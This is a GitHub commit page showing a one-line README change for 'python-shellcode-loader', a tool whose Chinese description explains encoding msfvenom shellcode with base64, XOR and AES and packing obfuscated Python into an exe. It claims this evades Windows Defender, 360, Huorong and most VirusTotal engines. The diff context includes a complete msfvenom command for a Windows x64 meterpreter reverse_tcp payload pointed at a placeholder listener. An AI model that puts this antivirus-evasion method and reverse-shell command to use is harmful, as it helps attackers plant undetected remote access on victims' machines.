Skip to content

Commit 9816325

Browse files
authored
Update README.md
1 parent b4a2964 commit 9816325

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@
55
免杀方式 msfvenom生成raw格式的shellcode-->base64-->XOR-->AES<br />将python代码缩小并混淆最后生成exe<br />目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等
66
<a name="H2jnt"></a>
77
## 获取项目
8-
git clone [https://github.com/HZzz2/python-shellcode-loader.git](https://github.com/HZzz2/python-shellcode-loader.git)<br />cd python-shellcode-loader
8+
git clone https://github.com/HZzz2/python-shellcode-loader.git <br />cd python-shellcode-loader
99
<a name="CuRMC"></a>
1010
## 生成shellcode
1111
#生成shellcode<br />`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw`

0 commit comments

Comments
 (0)